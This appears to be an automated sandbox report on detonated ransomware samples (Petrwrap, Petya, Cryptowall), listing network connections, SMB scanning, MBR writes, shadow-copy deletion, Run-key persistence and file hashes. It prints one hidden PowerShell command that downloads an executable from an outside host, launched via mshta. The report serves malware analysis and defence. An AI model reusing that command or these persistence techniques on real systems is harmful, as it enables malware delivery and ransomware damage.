| N/A | 10.127.0.38:445 | tcp | |
| US | 8.8.8.8:53 | 228.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.177:445 | tcp | |
| N/A | 10.127.1.177:139 | tcp | |
| N/A | 10.127.0.232:445 | tcp | |
| US | 8.8.8.8:53 | 229.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.232:139 | tcp | |
| N/A | 10.127.1.178:445 | tcp | |
| N/A | 10.127.1.178:139 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| US | 8.8.8.8:53 | 230.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.179:445 | tcp | |
| N/A | 10.127.0.233:139 | tcp | |
| N/A | 10.127.1.179:139 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.234:445 | tcp | |
| N/A | 10.127.0.235:445 | tcp | |
| N/A | 10.127.0.234:139 | tcp | |
| N/A | 10.127.1.180:445 | tcp | |
| N/A | 10.127.0.235:139 | tcp | |
| N/A | 10.127.1.180:139 | tcp | |
| N/A | 10.127.1.181:445 | tcp | |
| N/A | 10.127.1.181:139 | tcp | |
| N/A | 10.127.1.182:445 | tcp | |
| N/A | 10.127.1.182:139 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.1.183:445 | tcp | |
| US | 8.8.8.8:53 | 232.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.183:139 | tcp | |
| N/A | 10.127.1.184:445 | tcp | |
| N/A | 10.127.0.236:445 | tcp | |
| N/A | 10.127.1.184:139 | tcp | |
| N/A | 10.127.0.236:139 | tcp | |
| US | 8.8.8.8:53 | 233.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.185:445 | tcp | |
| US | 8.8.8.8:53 | 234.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.237:445 | tcp | |
| N/A | 10.127.1.185:139 | tcp | |
| US | 8.8.8.8:53 | 235.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.237:139 | tcp | |
| N/A | 10.127.1.186:445 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.1.186:139 | tcp | |
| N/A | 10.127.0.238:445 | tcp | |
| N/A | 10.127.0.239:445 | tcp | |
| N/A | 10.127.0.238:139 | tcp | |
| N/A | 10.127.0.239:139 | tcp | |
| N/A | 10.127.1.187:445 | tcp | |
| N/A | 10.127.1.187:139 | tcp | |
| N/A | 10.127.1.188:445 | tcp | |
| N/A | 10.127.1.188:139 | tcp | |
| N/A | 10.127.1.189:445 | tcp | |
| N/A | 10.127.1.189:139 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.1.190:445 | tcp | |
| US | 8.8.8.8:53 | 236.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.190:139 | tcp | |
| N/A | 10.127.0.240:445 | tcp | |
| US | 8.8.8.8:53 | 237.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.240:139 | tcp | |
| N/A | 10.127.1.191:445 | tcp | |
| N/A | 10.127.1.191:139 | tcp | |
| N/A | 10.127.1.192:445 | tcp | |
| US | 8.8.8.8:53 | 239.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.241:445 | tcp | |
| N/A | 10.127.0.241:139 | tcp | |
| N/A | 10.127.1.192:139 | tcp | |
| N/A | 10.127.0.43:445 | tcp |
Files
memory/5072-0-0x00000000023E0000-0x000000000243E000-memory.dmp
memory/5072-8-0x00000000023E0000-0x000000000243E000-memory.dmp
memory/5072-9-0x00000000023E0000-0x000000000243E000-memory.dmp
memory/5072-11-0x00000000023E0000-0x000000000243E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\56AB.tmp
| MD5 | 7e37ab34ecdcc3e77e24522ddfd4852d |
| SHA1 | 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf |
| SHA256 | 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f |
| SHA512 | 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587 |
memory/5072-22-0x00000000023E0000-0x000000000243E000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win7-20240611-en
Max time kernel
1559s
Max time network
1562s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2228 wrote to memory of 2964 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2228 wrote to memory of 2964 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2228 wrote to memory of 2964 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2228 wrote to memory of 2964 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\myguy.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\57618.exe');
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | french-cooking.com | udp |
| FR | 54.36.91.62:80 | french-cooking.com | tcp |
Files
memory/2228-0-0x0000000002860000-0x0000000002880000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win10v2004-20240611-en
Max time kernel
1800s
Max time network
1803s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File created | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe | N/A |
| File opened for modification | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe | N/A |
| File opened for modification | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe | N/A |
| File opened for modification | C:\Windows\assembly | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe | N/A |
| Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.99.8.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | 166.120.202.116.in-addr.arpa | udp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | 165.120.202.116.in-addr.arpa | udp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | 14.179.89.13.in-addr.arpa | udp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 204.8.99.144:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | 146.99.8.204.in-addr.arpa | udp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 204.8.99.146:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
Files
memory/1448-0-0x00007FFB0C8C5000-0x00007FFB0C8C6000-memory.dmp
memory/1448-1-0x00007FFB0C610000-0x00007FFB0CFB1000-memory.dmp
memory/1448-2-0x000000001D000000-0x000000001D4CE000-memory.dmp
memory/1448-3-0x000000001BE40000-0x000000001BEDC000-memory.dmp
memory/1448-4-0x000000001BF60000-0x000000001BFC2000-memory.dmp
memory/1448-5-0x000000001B880000-0x000000001B888000-memory.dmp
memory/1448-6-0x000000001DB00000-0x000000001DB52000-memory.dmp
memory/1448-14-0x00007FFB0C610000-0x00007FFB0CFB1000-memory.dmp
memory/1448-15-0x00007FFB0C8C5000-0x00007FFB0C8C6000-memory.dmp
memory/1448-16-0x00007FFB0C610000-0x00007FFB0CFB1000-memory.dmp
memory/1448-17-0x00007FFB0C610000-0x00007FFB0CFB1000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win7-20240508-en
Max time kernel
2s
Max time network
3s
Command Line
Signatures
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe"
Network
Files
memory/328-1-0x0000000000400000-0x00000000004CB000-memory.dmp
memory/328-0-0x000000000040E000-0x000000000041B000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:00
Platform
win10v2004-20240611-en
Max time kernel
3s
Max time network
12s
Command Line
Signatures
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
Files
memory/1896-0-0x000000000040E000-0x000000000041B000-memory.dmp
memory/1896-1-0x0000000000400000-0x00000000004CB000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win7-20240611-en
Max time kernel
1786s
Max time network
1803s
Command Line
Signatures
Deletes shadow copies
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d6587785.exe | C:\Windows\syswow64\explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Run\d658778 = "C:\\d6587785\\d6587785.exe" | C:\Windows\syswow64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*658778 = "C:\\d6587785\\d6587785.exe" | C:\Windows\syswow64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Run\d6587785 = "C:\\Users\\Admin\\AppData\\Roaming\\d6587785.exe" | C:\Windows\syswow64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*6587785 = "C:\\Users\\Admin\\AppData\\Roaming\\d6587785.exe" | C:\Windows\syswow64\explorer.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-addr.es | N/A | N/A |
| N/A | myexternalip.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2960 set thread context of 2404 | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\vssadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\explorer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe"
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe
